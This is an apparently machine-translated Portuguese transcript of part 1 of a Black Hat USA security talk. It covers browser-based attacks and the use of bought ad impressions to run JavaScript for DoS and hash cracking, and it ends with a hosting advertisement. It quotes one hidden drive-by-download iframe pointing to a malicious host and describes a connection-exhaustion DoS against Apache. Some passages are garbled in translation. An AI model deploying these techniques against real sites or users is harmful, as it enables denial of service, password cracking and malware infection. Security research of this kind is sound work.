Conferência BLACK HAT USA. Botnet de um milhão de navegadores. Parte 1

Jeremy Grossman: Fico feliz em receber todos vocês e quero dizer que estamos preparando esta apresentação há 6 meses, por isso nos esforçamos para compartilhar nossas conquistas o mais rápido possível. Quero agradecer a toda a equipe da Black Hat pelo convite, voltamos aqui todos os anos, adoramos este evento. Obrigado pelo chapéu preto! Vamos tentar tornar a apresentação de hoje divertida, mas primeiro queremos nos apresentar.



Sou o fundador e gerente de desenvolvimento de novos produtos da WhiteHat Security, localizada em Santa Clara, Califórnia. Nossa empresa tem cerca de 300 funcionários.

Matt é o diretor-gerente do centro de pesquisa de riscos de segurança. Na "cabeça branca", estamos empenhados principalmente em invadir sites, encontrar vulnerabilidades neles e fazer isso em grande escala. Mas ainda temos tempo para pesquisas, então hoje vamos começar a invadir navegadores e usá-los para invadir sites e mostrar todo o ciclo de segurança na web. Eu falei aqui pela primeira vez em 2002. Na maioria das vezes eu pesquiso no desenvolvimento e apresentação de nossos produtos.

Matt Johansson: Tenho experiência em trabalhar como testador de penetração (pentester) e comecei meu trabalho na empresa por sites de hackers, porque antes eu próprio chefiava o exército de hackers. Faço algumas pesquisas legais e tomo muito para que você possa entrar em contato comigo.



Jeremy Grossman: Então, vamos começar a nossa festa. Eu não acho que exista pelo menos uma pessoa que não acessou a Internet hoje. Talvez agora você não esteja conectado à Internet, mas quando você chegar em casa, todos os presentes aqui e todos que você conhece irão interagir com ele usando um navegador. Isso é apenas parte de nossas vidas diárias, e descreverei a você o que isso significa, mas a Internet é projetada principalmente para funcionar. Não invadimos a Internet, tentamos usá-la para nossos próprios propósitos.

Quando você visita uma página da Web, não importa qual navegador você usa - Chrome, Firefox, Safari, IE ou Opera, em qualquer caso, a Internet funciona de tal maneira que controla totalmente o navegador enquanto você está nesta página ou quando está procurando o próximo. página.

O JavaScript ou o flash nesta página podem fazer com que o navegador faça qualquer coisa - qualquer tipo de resposta a solicitações para qualquer lugar da Internet ou intranet. Isso inclui CSRF - solicitações falsas entre sites, XSS - scripts entre sites, clickjacking e muitos outros truques que permitem obter controle sobre o navegador.

Agora tentaremos entender melhor o que é a segurança do navegador, mas a idéia principal é obter uma idéia geral do controle do navegador sem usar explorações de dia zero, contra as quais não há patches.

Matt Johanson: Se você não sabe nada sobre XSS, pode nos perguntar sobre isso.

Jeremy Grossman: Agora quero falar brevemente sobre ataques a navegadores que usam HTML ou JavaScript malicioso:

• Pesquisa de interrogação no navegador
• solicitações falsas entre sites; detecção de login; reconhecimento de login;
  Hackeando a intranet
  Script cruzado automático
  malware tradicional que entra no computador do usuário ao fazer o download usando o método Drive-by-Download;
  hash brute force cracking;
  Ataques DDoS no nível do aplicativo.
  
  
  
  
  Neste slide, você vê uma amostra de Interrogação do navegador - é apenas o JavaScript que permanece no navegador quando você acessa outro site. Esta é uma captura de tela da CNN. Quando você visita o site, a métrica é conectada ao seu navegador, que realiza uma pesquisa completa e recebe um monte de informações sobre sua visualização: qual navegador você tem, qual versão, quais plugins estão conectados, qual sistema operacional você possui. Eles fazem isso porque querem saber quem visitou o site. Atualmente, essa é uma tecnologia muito comum.
  
  Em seguida, considere uma tecnologia mais avançada - falsificação de JavaScript entre sites. Não requer muito esforço, você não precisa executar um script malicioso, apenas o seu navegador com JavaScript ou HTML é usado para invadir qualquer outro site. O CSRF usa seu histórico de pesquisa do Google e força seu navegador a carregar ou baixar conteúdo ilegal, iniciar uma transferência bancária, se você acessar sua conta pessoal no site do banco, forçará o envio de mensagens abusivas ou o voto de Ed Snowden como a pessoa do ano.
  
  Matt Johanson: O CSRF pode forçá-lo a não apenas baixar os hits de Justin Bieber, mas também baixar pornografia infantil.
  
  Jeremy Grossman: então, a primeira linha do slide força o navegador a injetar conteúdo malicioso em qualquer outro site, ou seja, pode torná-lo um hacker, a segunda obriga a baixar o torrent e o transforma em um pirata que viola todos os tipos de licenças DMCA, e a terceira o envia ao clube de fãs Justin Bieber, quarta votação em algum site.
  
  
  
  A seguir, é o reconhecimento do login de Detecção de login - é quando você acessa o site que controlamos. Podemos descobrir que você está conectado à sua conta no Google, Facebook, Twitter, Linkedin. Existem 6 tecnologias diferentes para extrair dados de autorização do seu navegador. Estudamos suas preferências e realizamos um ataque direcionado a um usuário específico.
  
  
  
  Outro ataque é o clickjacking, que permite revelar seus dados assim que você clica em qualquer imagem ou botão. Digamos que você fez login no Twitter ou no Facebook e gostou da imagem de um gato dançando. Você clica em algo inofensivo, mas, na realidade, clica em um desses botões e revela seus dados. Apenas um clique - e sabemos o seu nome, localização, os dados que você publicou no seu perfil no Twitter ou LinkedIn.
  
  
  
  Matt Johanson: algumas empresas estão envolvidas nesse rastreamento, pois seu nome completo pode ser de grande valor para a publicidade direcionada de seus produtos ou serviços.
  
  Jeremy Grossman: Até agora, discutimos coisas bem conhecidas, pelo menos bem conhecidas do público da Black Hat. Você também está ciente de violar a intranet da Intranet injetando JavaScript malicioso via HTTP no roteador DSL que fornece conectividade de rede.
  
  
  
  Isso foi descoberto pela primeira vez em 2006 e até agora essa vulnerabilidade não foi corrigida. Além disso, temos o tipo de ataque “script automático entre sites”, ao usar o iframe, uma injeção de código XSS malicioso é executada, o que permite roubar seus cookies, senhas salvas e assim por diante. Isso é feito principalmente através do portal do provedor de email.
  
  
  
  Por fim, você pode baixar o malware tradicional usando o método Drive-by-Downloads injetando a seguinte linha:
  
  

  <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

  
  Como resultado, seu navegador é enviado para sites infectados para baixar conteúdo malicioso, que controla seu computador. Aqui, o objeto do ataque pode ser o próprio navegador ou suas extensões; principalmente, esses ataques são usados ​​para criar uma rede de botnets; para evitar essa ameaça, você precisa instalar os patches no prazo e é melhor remover o Java completamente. Resumidamente, esses são os métodos de ataque nos quais focaremos nesta palestra.
  
  Matt Johansson: Jeremy falou sobre coisas já mencionadas em conferências anteriores do BlackHat. Eu gostaria de falar sobre outro estudo que se concentrou na computação distribuída usando JavaScript para quebrar senhas. Isso é legal, porque você pode simplesmente escrever e funciona muito, muito rápido. A pesquisa de Lavakumar Kuppan sugere que, com a métrica que ele inventou, você pode realmente hackear ou tentar quebrar cem mil hashes MD5 por segundo usando JavaScript, se você puder distribuir esse JavaScript.
  
  O slide a seguir mostra como o sistema de computação distribuído Ravan baseado em JavaScript funciona, que pode atacar hashes em vários navegadores usando um ataque de força bruta.
  
  Ele usa o HTML5 para executar o JavaScript em segundo plano nos WebWorkers, incluindo muitos computadores nos quais um navegador está aberto em uma única rede de adivinhação de senha. Ela encontra a senha do usuário que corresponde a um hash específico, classificando de 60 a 70 mil senhas por segundo, 12 WebWorkers são usados ​​para isso.
  
  
  
  Isso é uma coisa muito rápida, depois focaremos em como é distribuída. Além desse problema, pesquisamos seriamente aplicativos que causam falha de serviço (DoS) há vários meses. O navegador pode enviar um número surpreendentemente grande de solicitações GET para um site remoto usando o COR dos WebWorkers. Durante a pesquisa, descobriu-se que cerca de 10.000 solicitações por minuto podem ser enviadas a partir de um único navegador. Ao mesmo tempo, o navegador não mantém muitas conexões TCP abertas, apenas inicia simultaneamente muitas solicitações HTTP. Você pode usar um único navegador e vários navegadores destinados a um site. Mas a qualquer momento você pode aumentar a intensidade do ataque aumentando o número de conexões.
  
  Jeremy Grossman: Vou falar sobre as limitações do navegador nas conexões.
  
  
  
  Uma ferramenta chamada Browserscope mostra quantas conexões um navegador específico ou uma versão específica do navegador pode suportar por vez. Todos os navegadores suportam não mais que 6 conexões com o mesmo nome de host e o número máximo de conexões, por exemplo, nas versões 8 e 9 do IE chega a 35. Cada navegador tem um limite no número de conexões, não por segurança, mas por estabilidade e desempenho, porque você acessa o site , envie uma solicitação e seu navegador começará a baixar o conteúdo.
  
  Verificamos esses indicadores e podemos dizer que a maioria dos navegadores realmente oferece trabalho com 6, com no máximo 7 conexões. O slide a seguir mostra a operação do Browserscope, que testa o desempenho de vários navegadores, criando muitas conexões simultâneas com o servidor. Nesse caso, havia seis conexões estáveis ​​para o Firefox.
  
  No entanto, alguns navegadores permitem contornar essa limitação e, em nossos testes, usamos o Firefox para causar uma falha no serviço. O próximo slide mostra o script Apache Killer, que ajudou a contornar a restrição do navegador, criar um fluxo inteiro de solicitações simultâneas ao servidor e aumentar o número de conexões abertas simultaneamente de 6 para 300.
  
  
  
  O protocolo HTTP foi usado aqui, mas se você usar FTP pela porta 80, o número de conexões aumentará para 400, e isso realmente pode "matar" o servidor Apache.
  
  Matt Johanson: A diferença importante aqui é que fizemos isso usando FTP, que não pode usar o protocolo HTTP. Portanto, não conseguimos verificar muitas posições no topo da lista e não conseguimos executar muitos aplicativos de RSE. Essas são apenas as conexões que tentamos abrir ao mesmo tempo, portanto, esse não é um ataque tradicional de DoS, quando um invasor tenta iniciar o maior número possível de megabits ou gigabits por segundo ou por hora, esse é apenas o número permitido de conexões abertas simultaneamente.
  
  Jeremy Grossman: agora vou rodar o servidor Apache no meu laptop, esta é uma versão simples do Apache 2.4.4, onde todas as configurações básicas são definidas por padrão e não podem ter impacto significativo.
  
  
  
  Vamos nos concentrar no primeiro ciclo, vou instalar um monte de solicitações de imagem no servidor aqui, você vê como as solicitações são enviadas e o servidor não responde por 3 segundos e as fotos começam a ser carregadas em série.
  
  Matt Johanson: Esse é um aspecto do desempenho do navegador, não um aspecto da segurança. Podemos abusar dele às custas da segurança; você o verá em alguns minutos. Mas o objetivo dessa ação é fazer o download de todas essas imagens de uma só vez.
  
  Jeremy Grossman: Esqueci de mencionar o status do servidor; na tela inferior esquerda, você vê que o status mostra 7 conexões abertas simultaneamente, uma para a janela do navegador e a outra 6 para 6 imagens carregadas. Isso é muito importante, porque agora estamos tentando quebrar a borda superior das conexões neste navegador em particular. Agora vou definir o valor da conexão como 0 para eliminar essas conexões e mostrar uma maneira de ignorar as restrições no Firefox.
  
  Simplesmente fazemos loop até 100 conexões usando FTP para o mesmo nome de host. Todos eles não precisam de um URL, porque é FTP, não envia HTTP. Olhe no canto inferior esquerdo - o status do servidor mudou, mostra 100 conexões, 100 páginas para visualização. Agora vamos passar para 400 conexões.
  
  A página é atualizada a cada segundo e, quando o número de conexões atinge 270, o servidor sofre um "pânico" de não ter tempo para atender a mais solicitações. Tudo o que fazemos é fazer upload desse código em uma página da Web, e o Apache está tentando elevar o número de conexões abertas simultâneas para 300. E fazemos tudo isso com um único navegador.
  
  Na parte de trás do plano de fundo, você vê outra rolagem, temos outro sistema na Amazon, este é o sistema da AWS. Não quero matá-la com um ataque de negação de serviço no momento. Ofereci-lhe outra opção de demonstração.
  Matt Johansson: Agora sabemos o que podemos fazer, pelo menos com o Firefox. Este não é um ataque tradicional de negação de serviço e a botnet não é usada aqui. Ainda temos mais algumas possibilidades, mas, em geral, as vantagens de invadir esse método de ataque são as seguintes:
  
  
  • nenhum malware, nenhuma exploração ou ataques de dia zero são necessários;
  • sem vestígios, sem ansiedade, proibição de cache do navegador;
  • por padrão, qualquer navegador é vulnerável a esse ataque;
  • muito fácil de implementar, você viu como o código é simples;
  • como dizemos - funciona da maneira que deveria funcionar. A Internet é potencialmente projetada para funcionar dessa maneira, ou seja, deve garantir que várias imagens sejam baixadas o mais rápido possível.
  
  Portanto, não sei quem pode corrigir esse problema. Vamos nos concentrar na questão de espalhar esse método de ataque usando código JavaScript malicioso. Não consideraremos as formas clássicas que os spammers usam, como o envio de e-mails. Considere a distribuição por um usuário comum, ou seja, dimensionando do ponto de vista de um usuário comum:
  
  
  • uso de sites com tráfego significativo que você possui (blog, software etc.);
  • Injeções de HTML em sites populares, fóruns etc.
  • o método "man in the middle" através de um roteador Wi-Fi;
  • "Envenenamento" dos motores de busca;
  • sites de hackers por injeção em massa de worms SQL;
  • widgets de terceiros (previsão do tempo, contadores, rastreadores etc.).
  
  Douglas Crockford disse: "A maneira mais confiável e econômica de injetar código malicioso é comprar anúncios". Portanto, consideraremos como as redes de publicidade funcionam, porque existem muitas na Internet. O próximo slide mostra um ecossistema de publicidade peculiar.
  
  
  
  Portanto, na parte superior, você vê que os anunciantes devem mostrar antes de tudo algo, por exemplo, um buquê de flores para uma data. Eles gastam dinheiro com isso, mas precisam de sites para levar seus produtos ao consumidor final. Eles querem manter em suas mãos distribuidores de massa - editores de informações como blogs, notícias, redes sociais, resenhas, sites populares visitados por muitos usuários. Existe uma ponte entre anunciantes e editores chamada Redes de publicidade. Eles gastam dinheiro publicando suas informações nessas redes, podem ser imagens, banners pop-up, JavaScript - qualquer coisa que você queira ver. Vocês são as pequenas figuras azuis na parte inferior do slide.
  
  Matt Johansson: Hoje de manhã, fomos ao site da TMZ e fizemos uma captura de tela incrível lá.
  
  
  
  Você vê o bloco de anúncios na parte superior da página e no canto inferior direito.
  
  Jeremy Grossman: todos os blocos de anúncios que você vê são códigos JavaScript localizados diretamente na frente dos usuários do site da TMZ e servem para atrair sua atenção e ganhar dinheiro. Existem dezenas e centenas dessas redes de publicidade, mas lembre-se de que a imagem do logotipo da nossa empresa no canto superior direito do slide não é uma rede de publicidade! Algumas dessas redes usam JavaScript, outras não.
  
  Então, escrevi para os proprietários de uma rede de publicidade uma carta sobre o que eu gostaria de colocar JavaScript de publicidade de terceiros em seu sistema. Um dos caras me respondeu muito rapidamente, literalmente em alguns minutos. Ele escreveu que eles permitem apenas que esse código seja publicado em empresas grandes e conhecidas, como a DoubleClick, nas quais confiam e que examinam todos os materiais em busca de possíveis vulnerabilidades. E se eu trabalhar com servidores de anúncios de terceiros grandes como o DFA e similares, eles encontrarão a oportunidade de hospedar meu JavaScript.
  
  
  
  Todas as redes de publicidade tradicionais se comportam dessa maneira - você paga a eles, recebe algumas métricas e eles colocam seu anúncio. Existe outro tipo de rede que encontramos. Deliberadamente, não fornecemos seus nomes, porque não sabemos se teremos problemas por causa disso.
  
  
  
  Esses sistemas funcionam dessa maneira - você paga um pouco de dinheiro por alguém sentado em casa na frente do computador à noite para visualizar sua página no navegador por um certo período de tempo. Acontece que você compra o tempo do navegador por um centavo - nesse caso, 10 mil minutos de visualização podem ser comprados por cerca de US $ 10,5.
  
  Matt Johansson: Uma circunstância importante é que esse método de visualizações pagas é amplamente usado para quebrar uma senha. Como um invasor precisa de muito tempo para quebrar uma senha ou fazer login usando o método de força bruta, essas redes de anúncios não garantem que o navegador esteja exibindo anúncios, mas não capturam código malicioso iniciado assim que um anúncio é carregado na página. Você paga por isso, mas se uma pessoa fica lá por um minuto, 10 minutos, 2 segundos, não há garantia de que você não pagará pelo fato de poder ser usado para um ataque de negação de serviço.
  
  Jeremy Grossman: preste atenção na última linha - você pode comprar um milhão de minutos de visualização, são quase 2 anos de tempo do navegador, por cerca de US $ 650. Portanto, essa é uma boa métrica!
  
  Agora, a Internet trabalha com publicidade e vale um centavo. Vamos voltar à agenda e focar nos dois últimos tipos de ataques - cracking de hash de força bruta e ataques DDoS no nível do aplicativo. Você vê que eles podem ser facilmente redimensionados para um milhão pelo navegador ou simplesmente pagar US $ 650 e começar a invadir a senha por um período de dois anos. Vamos mostrar algumas demonstrações, mas primeiro, vamos falar sobre economia.
  
  Matt Johansson: Você viu esta captura de tela da compra de minutos, mas as redes de anúncios têm seu próprio idioma, o que não foi fácil para mim aprender. Os anunciantes chamam isso de "impressões", mas estamos falando de serviços de publicidade paga em páginas específicas. Nos últimos meses, o preço ficou em cerca de 50 centavos por 1.000 "impressões" ou por mil impressões de anúncio. Existem etiquetas de preço de CPC e custo de mil CPM.
  
  
  
  Portanto, quando digo "impressão", você deve imaginar o navegador como um bot, como se tivesse contratado uma pessoa para fazer upload de seus anúncios no navegador e obter o controle desse navegador no momento. Então, eles chamam de "impressão", e nós chamamos de "bot".
  
  Jeremy Grossman: Não há obstáculos para impedir que bandidos, bandidos de verdade roubem cartões de crédito, possam usar esses cartões roubados para comprar minutos de publicidade ou "impressões".
  
  Matt Johanson: Na captura de tela a seguir, você vê as estatísticas da rede de anúncios que usamos em nossa pesquisa.
  
  
  
  Sentimos que estávamos na frente do painel, clicando nos botões e tentando exibir nossos anúncios nessa rede. Não exibimos anúncios, apenas manequins e não executamos nosso código JavaScript. Nós apenas nos testamos como anunciantes e tentamos permanecer o mais discretos possível para o usuário e os proprietários da rede de publicidade, para que eles nos permitam usar nossos métodos pacíficos de hackers, comandando nossos próprios servidores da web. Nos poucos meses de nossa pesquisa, nem gastamos 10 dólares.
  
  Você pode definir limites diários para todos os tipos de itens de publicidade, escolher palavras-chave específicas nas quais os usuários devem se concentrar, escolher a localização geográfica do público-alvo, sistemas operacionais ou navegadores em que seu anúncio será exibido, concentrar os anúncios nos dispositivos móveis ou estacionários dos usuários.
  
  Acabei de escolher o maior alcance possível do público-alvo e escolhi a palavra "computadores" como palavra-chave. No primeiro dia, compramos apenas 15 cliques, custou US $ 4, como resultado, recebemos 8326 "impressões". Imagine que, com um investimento tão lucrativo, seu código possa ser baixado para 8326 navegadores por um período de 24 horas!
  
  Conferência BLACK HAT USA. Botnet de um milhão de navegadores. Parte 2
  
  
  Obrigado por ficar conosco. Você gosta dos nossos artigos? Deseja ver materiais mais interessantes? Ajude-nos fazendo um pedido ou recomendando a seus amigos, um desconto de 30% para os usuários da Habr em um análogo exclusivo de servidores básicos que inventamos para você: Toda a verdade sobre o VPS (KVM) E5-2650 v4 (6 núcleos) 10GB DDR4 240GB SSD 1Gbps da US $ 20 ou como dividir o servidor? (as opções estão disponíveis com RAID1 e RAID10, até 24 núcleos e até 40GB DDR4).
  
  VPS (KVM) E5-2650 v4 (6 núcleos) 10GB DDR4 240GB SSD de 1Gbps até dezembro de graça quando pagar por um período de seis meses, você pode fazer o pedido aqui .
  
  Dell R730xd 2 vezes mais barato? Somente nós temos 2 TVs Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 a partir de US $ 249 na Holanda e nos EUA! Leia sobre Como criar um prédio de infraestrutura. classe usando servidores Dell R730xd E5-2650 v4 custando 9.000 euros por um centavo?